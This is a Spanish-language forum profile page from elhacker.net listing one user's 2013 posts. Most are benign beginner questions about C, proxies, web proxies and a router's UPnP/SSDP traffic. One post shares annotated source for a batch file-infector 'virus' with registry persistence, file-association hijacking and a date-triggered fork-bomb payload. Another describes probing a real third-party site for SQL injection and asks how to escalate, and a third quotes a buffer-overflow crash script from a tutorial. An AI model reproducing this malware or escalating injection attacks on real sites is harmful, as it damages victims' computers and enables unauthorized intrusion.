elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3
1  Foros Generales / Foro Libre / habran dominicanos en este foro? en: 14 Marzo 2013, 06:23 am
El nombre el topic lo dice todo, habran Dominicanos en este foro? o acaso soy el unico?









saludos
2  Seguridad Informática / Seguridad / curiosiando con mi router, sera esto un bug? en: 14 Marzo 2013, 05:43 am
Hola hace ya un tiempo que no posteaba nada y solo me dedicaba a entrar al foro de vez en cuando....bueno hace ya un tiempo, algo asi antes de febrero, estaba aburrido y decepcionado por que no tenia conexión a internet...el problema, el router parecia conectarse y desconectarse o al parecer se estaba reiniciando cada cierto tiempo por lo que la senal se caia y me sacaba de internet..

Quise investigar que era lo que pasaba asi que como siempre hago para trabajar con redes puse a andar wireshark para ver que sucedia y esto fue lo que encontre:

****************************************************************************************
[1]-->mi router estaba enviando paquetes SSDP[https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol]

[2]-->no solo era mi router tambien lo estaba haciendo otra IP en mi red [Location:http://10.0.0.7:2869/upnphost/udhisapi.dll?content=uuid:491edc4f-388c-4235-a391-bb0642861f38\r\n]

[3]-->los paquetes SSDP tenian cabezeras http [NOTIFY * HTTP /1.1 - M-SEARCH * HTTP/1.1]

[4]-->todos ivan a la misma direccion y puerto[239.255.255.250:1900]
****************************************************************************************

Todos los que me conocen saben lo curioso que soy y podrian adivinar que sera lo siguiente que pasara..

Primero: use nmap para escanear el router como parecia ser el origen del problema y encontre unos puertos abiertos:
Código:
-------------------------------------
Scanning 10.0.0.1 [1000 ports]
Discovered open port 443/tcp on 10.0.0.1
Discovered open port 21/tcp on 10.0.0.1
Discovered open port 80/tcp on 10.0.0.1
Discovered open port 23/tcp on 10.0.0.1
Discovered open port 8085/tcp on 10.0.0.1
--------------------------------------

como no se de memoria cuales son los servicios que corren en cada puerto[a excepcion del 21,23 y 80] busque informacion sobre el puerto 8085, pero los resultados no me convencieron, algunos decian que se usa para correr un VMWare server? que si audio/video? naaaah! asi que volvi a mirar el fingerprint de Nmap para ver que podia encontrar:

No se si an visto los 'Service Fingerprints' de Nmap pero mirarlos es un poco dificil asi que tuve que limpiarlo[quitarle todos lo \x20] para poderlo leer de mejor manera...y resultaron ser cabezeras http:

Código:
GetRequest,16E,"HTTP/1\.0 401 Unauthorized\r
Server:Apache\r\n
Pragma: no-cache\r\nCache-Control: max-age=0, must-revalidate\r\nConnection: close\r\nContent-type: text/html\r\nWWW-Authenticate: Basic realm=\"Thomson Gateway\"\r\n\r\n
<HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD>
<BODY>
<H1>401 Authorization Required</H1>
Browser not authentication-capable or authentication failed.
</BODY>

Código:
HTTPOptions,155,"HTTP/1\.0\ 400 Bad Request
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Content-type: text/html
<HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD>
<BODY><H1>400 Bad Request</H1>
Your clientsent a query that this server could not nunderstand.
<P>Reason: Invalid or unsupported method.<P>
</BODY>

y me di cuenta que debia ser un servidor.....

segundo: busque informacion en google sobre la dichosa DLL que aparecia en la direccion que estaba enviando la otra IP de mi red, ya que esa IP era de un host windows a primera instancia pense que se trataba de alguna infeccion..

la mejor descripcion de para que sirve la encontre en ingles...

Código:
After discovery of existing network devices, the UPnP Device Host, along with the udhisapi.dll module, does the following:

1. Announce the device in accordance to UPnP's discovery protocol.

2. Respond to queries for the device's description.

3. Route control requests to the part of the device's code that implement its functions.

4. Maintain event subscriptions to services that the device provides.

5. Send event notifications to subscribers when the state of the device's service changes.

..la funcion numero uno[anunciar el equipo en concordancia con el protocolo de descubrimiento UPnP me dejo mas preguntas que respuestas...si es un protocolo de anuncion de equipos, por que lo hace una pc?, por que mi router debe hacerlo tantas veces? y por que la conexión se pierde cuando esta haciendo ese proceso? loooooooooool me estaba poniendo loco.

Aparte HD Moore y un equipo de personas[http://www.itnews.com.au/News/330477,researchers-warn-of-widespread-upnp-bugs.aspx]  habian descubierto un fallo en UPnP, esto me tenia nervioso, por que pense que quiza alguien estaba jugando con mi router y posiblemente podria haber interceptado algo de informacion..

Pero decidi escanear mi router el cual resulto negativo a la prueba de UPnP de rapid7[http://upnp-check.rapid7.com/]

Pero el problema persistia y ya hasta sudaba la frustracion...


he aqui la razon por la que este post se ha hecho tan largo, decidi mirar algunos paquetes interceptados por Wireshark de nuevo, econtrandome con la siguiente direccion..http://10.0.0.1:80/igd.xml por supuesto decidi hecharle un ojo usando firefox.

En esa direccion pude encontrar referencia a otros archivos de extension .XML los que me parece son los archivos de configuracion del router un Thomson TG580, o acaso me estoy equivocando?

mis preguntas para terminal este post:
1- no es peligroso que los routers tengan sus archivos de configuracion acesibles atravez de un browser?
2-que se puede lograr accediendo estos archivos?


saludos
3  Foros Generales / Dudas Generales / problema con proxies :? en: 31 Enero 2013, 20:17 pm
Hola, para entrar a este foro desde hace ya un tiempo he estado usando recurrentemente proxies que pertenecen a 'Privax Networks'..

No habia tenido ningun tipo de problema hasta el dia de hoy cuando ingrese al foro al parecer todo estaba muy normal aparentemente hasta que quice responder a unos de los post de varios que he hecho ya en este foro, lo que sucede es que cuando le hago click a responder a pesar de estar ya dentro del foro me redirecciona a ingresar...

Debo subrayar que algunos de los 'Web proxies' que uso normalmente al parecer estan teniendo problemas puesto que no he podido entrar a sus paginas, me estara pasando solo a mi o tal vez alguna otra persona estara teniendo el mismo problema??

Se me olvidaba decir que el problema lo tuve con HideMyAss


saludos
4  Programación / Programación C/C++ / [src]problema con fflush() en: 26 Enero 2013, 22:55 pm
Hola, como ya he dicho en otras ocasiones estoy siguiendo un libro para aprender a programar en C, en el capitulo 13 hay un codigo para un programa que se supone lo que hace es comparar dos caracteres...este es el codigo:

Código
  1. #include <stdio.h>
  2.  
  3. int main()
  4. {
  5.  char a,b;
  6.  
  7.  printf("Which character is bigger?\n");
  8.  printf("Type a single character:");
  9.  a=getchar();
  10.  printf("Type another character:");
  11.  b=getchar();
  12.  
  13.  if(a > b)
  14.  {
  15.    printf("'%c' is greater than '%c'!\n",a,b);
  16.  }
  17.  else if(b > a)
  18.  {
  19.    printf("'%c' is greater than '%c'!\n",b,a);
  20.  }
  21.  else
  22.  {
  23.    printf("Next time don't press the same character");
  24.  }
  25.  return(0);
  26. }
  27.  

se suponia que todo deberia haber marchado bien, sin embargo segun se explica luego en otras paginas esto no sera asi por que la funcion getchar() solo lee standard input y el output que se odtiene no es el deseado...por lo que (segun dice el libro) hay que agregar una funcion que limpie lo que getchar() mete en la variable 'a'....esa funcion es fflush()..

entonces el codigo quedara asi:

Código
  1. #include <stdio.h>
  2.  
  3. int main()
  4. {
  5.  char a,b;
  6.  
  7.  printf("Which character is bigger?\n");
  8.  printf("Type a single character:");
  9.  a=getchar();
  10.  fflush(stdin);
  11.  printf("Type another character:");
  12.  b=getchar();
  13.  
  14.  if(a > b)
  15.  {
  16.    printf("'%c' is greater than '%c'!\n",a,b);
  17.  }
  18.  else if(b > a)
  19.  {
  20.    printf("'%c' is greater than '%c'!\n",b,a);
  21.  }
  22.  else
  23.  {
  24.    printf("Next time don't press the same character");
  25.  }
  26.  return(0);
  27. }
  28.  

el problema es que a pesar de que agrego fflush() el problema persiste el libro sugiere que si todo sigue igual debo agregar fpurge() cosa que el compilador(GCC) me tira un error a causa de esa "funcion"..


!bash-4.2# gcc greater2.c -o greater2
/tmp/cckp5r6k.o: In function `main':
greater2.c:(.text+0x33): undefined reference to `fpurge'
collect2: error: ld returned 1 exit status


entonces me pregunto..estare haciendo algo mal? por que fflush() no funciona? y ademas fpurge() me causa errores, habra otra solucion?


saludos y gracias
5  Seguridad Informática / Nivel Web / alguna otra tool como burpsuite? en: 25 Enero 2013, 22:49 pm
me descargue la burpsuite...pero no me siento comodo usandola sabiendo que la que tengo es solo un pedazo de lo que la herramienta en realidad es ya que el autor ofrece una version "pro" y una edicion gratuita que tiene features que le faltan..

en vista del asunto podria alguien recomendarme una herramienta que se le paresca o sea mejor?



E.P.: ya encontre la herramienta que andaba buscando..se llama WebScarab[https://www.owasp.org/index.php/WebScarab_Getting_Started/es] es gratuita y tiene muchas features hay algunas otras como el ZAP[https://code.google.com/p/zaproxy/downloads/list] pero probare primero WebScarab y vere que tal me va..


saludos
6  Seguridad Informática / Nivel Web / resultados y dudas ahora que hacer? ??? en: 18 Enero 2013, 13:47 pm
Bueno pasando revista a las pocas cosas que se de SQLi encontre una pagina, y trate de hacerle la prueba tipica para ver si era vuln o no..al principio modifique unos parametros:

--> .php?categoria=1 ---->.php?categoria=lol

luego quise hacerlo de otra forma asi que agregue una comilla(') delante del uno...

--> .php?categoria=1 ---> .php?categoria='1

luego quise intentar otra cosa y decidi intentar algo un poco mas elavodo...

--> .php?categoria=1 ---> .php?categoria='1+and+1=0

ahora mi pregunta y mi duda...con todas las modificaciones que hice odtuve el mismo resultado..

Código:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/****/public_html/*******.php on line 68

quiere esto decir que el servidor es realmente vulnerable a SQLi? o es solo un error nada mas? si quiero continuar con una inyeccion mas elavorada como debo proceder? o que debo solicitudes debo inyectar?


saludos y gracias
7  Programación / Scripting / [src]batch-virus]f_to en: 17 Enero 2013, 16:32 pm
yo en mi aburrimiento nocturno cree el siguiente codigo infector de archivos con la extension .bat, les pido de ante mano que si tienen alguna recomendacion o encuentran algun error me lo hagan saber..el codigo es bastante simple...aqui el codigo:


Código
  1. ::*************************************************************
  2. ::* nombre:f_to -- payload:si [fork-bomb] -- infeccion:si
  3. ::* tipo:.bat infector -- Anti AV tech:no -- propagacion:no
  4. ::*========================================
  5. ::*=Este codigo fue creado con fines autodidacticos solamente
  6. ::*=el autor del mismo(osea yo) no tomara responsabilidad de
  7. ::*=ningun problema causado como resultado de su ejecucion
  8. ::*==================n3t_3rr0r@hushmail.com==
  9. ::*************************************************************
  10. ::@echo off
  11. ::salta al disco C:
  12. ::si existe el directorio "placenta" salta a una etiqueta que termina su ejecucion sino salta a otra etiqueta para continuar su ejecucion
  13. if exist placenta (
  14. goto _eof
  15. ) else (
  16. goto _cnt
  17. )
  18. :_cnt
  19. ::crea una carpeta para alojarse
  20. mkdir placenta
  21. ::le da attributos oculto/solo lectura/sistema
  22. attrib +h +r +s placenta
  23. ::se auto-copia con el nombre f_to
  24. copy %0 > c:\placenta\f_to.bat
  25. ::toma atributos de lectura y systema
  26. attrib +r +s c:\placenta\f_to.bat
  27. ::se asocia a la extension .avi
  28. assoc .bat=avifile
  29. ::agrega una llave al registro para garantizar ejecucion durante el proximo inicio
  30. reg add HKLM\Microsoft\Windows\CurrentVersion\Run /v SysMgr /t Reg_SZ /d C:\placenta\f_to.bat
  31. ::payload - si la fecha es igual o mayor que 13-12-13 salta a la etiqueta para activar el payload
  32. if %date% GEQ 13-12-13 (
  33. goto _pyld
  34. ) else (
  35. goto _eof
  36. )
  37. ::busca archivos .bat y los infecta
  38. for /R %%i in (*.bat) do copy %0 %%i
  39. ::y luego le da atributos de sistema/oculto
  40. for /R %%i in (*.bat) do attrib +s +h %%i
  41. :_pyld
  42. :_fb
  43. start %0
  44. goto _fb
  45. :_eof
  46. exit /B
  47.  

saludos
8  Programación / Programación C/C++ / caso raro! en: 17 Enero 2013, 13:44 pm
practicando los ejemplos del libro de C que estoy leyendo pude crear un programa que lo unico que hace es comparar la altura del usuario con la mia(suena bastante estupido lo se) todo funciona bien el programa compila y se ejecuta a la perfeccion :D...sin embargo deberia fallar cuando en vez de recibir un numero recibe una letra cosa que no pasa, habra algun error??

E.P.:se me olvido preguntar si quiero que el programa muestre un error cuando el input es una latra y no un numero como lo puedo hacer?? por ejemplo lo ejecute y le puse 'h' en vez de de un numero del 1 al 9 y el mensaje que recibi fue:

Soy mayor que tu

este es el codigo:

Código:
#include <stdio.h>
#include <stdlib.h>

int main()
{
char feet[2];
int msr;

printf("Di tu altura en pies:");
gets(feet);
msr=atoi(feet);

if(msr>5) printf("Eres mas alto que yo!.\n");
if(msr<5) printf("Soy mas alto que tu!\n");
if(msr==5) printf("Somos de la misma altura!!.\n");

return(0);
}

saludos
9  Programación / Scripting / saber el tamano de un archivo en batch? en: 14 Enero 2013, 21:59 pm
lo que quiero hacer es lo siguiente:

Código:
eco apagado;
:chck_size
si archivo.bat %size% == %variable-size%;
hacer (esto) delocontrario hacer (esto-otro);
:fda

se que hay un parametro que revisa el tamano de un archivo creo que es el %~z1 pero los ejemoplos que vi del uso de esto se uso en un script que analizaba el tamano de otro archivo .bat, en mi caso quiero que el .bat revise su propio tamano


saludos y gracias
10  Seguridad Informática / Bugs y Exploits / confusion! en: 11 Enero 2013, 09:49 am
saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Páginas: [1] 2 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines